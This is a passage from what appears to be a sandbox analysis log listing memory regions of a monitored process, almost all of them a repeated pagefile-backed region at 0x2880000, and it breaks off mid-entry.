"pagefile_0x0000000002880000" filename = "" Region: id = 11551 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11552 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11553 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11554 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11555 start_va = 0x4140000 end_va = 0x4142fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 11556 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11557 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11558 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11559 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11560 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11561 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11562 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11563 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11564 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11565 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11566 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11567 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11568 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11569 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11570 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11571 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11572 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11573 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11574 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11575 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11576 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11577 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11578 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11579 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11580 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11581 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11582 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11583 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11584 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11585 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11586 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11587 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11588 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11589 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11590 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11591 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11592 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11593 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11594 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11595 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11596 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11597 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11598 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11599 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11600 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11601 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11602 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11603 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11604 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11605 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11606 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11607 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11608 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11609 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11610 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11611 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11612 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11613 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11614 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11615 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11616 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11617 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11618 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11619 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11620 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11621 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11622 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11623 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11624 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11625 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11626 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11627 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11628 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11629 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11630 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11631 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11632 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11633 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11634 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11635 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11636 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11637 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11638 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11639 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11640 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11641 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11642 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11643 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11644 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11645 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11646 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11647 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11648 start_va = 0x2880000 end_va = 0x288ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002880000" filename = "" Region: id = 11649 start_va = 0x7770000 end_va = 0x778dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007770000" filename = "" Region: id = 11650 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11651 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11652 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11653 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11654 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11655 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11656 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11657 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11658 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11659 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11660 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11661 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11662 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11663 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11664 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11665 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11666 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11667 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11668 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11669 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11670 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11671 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11672 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11673 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11674 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11675 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11676 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11677 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11678 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11679 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11680 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11681 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11682 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11683 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11684 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11685 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11686 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11687 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11688 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11689 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11690 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11691 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11692 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11693 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11694 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11695 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11696 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11697 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11698 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11699 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11700 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11701 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11702 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11703 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11704 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11705 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11706 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11707 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11708 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11709 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11710 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11711 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11712 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11713 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11714 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11715 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11716 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11717 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11718 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11719 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11720 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11721 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11722 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11723 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11724 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11725 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11726 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11727 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11728 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11729 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11730 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11731 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11732 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11733 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11734 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11735 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11736 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11737 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 11738 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 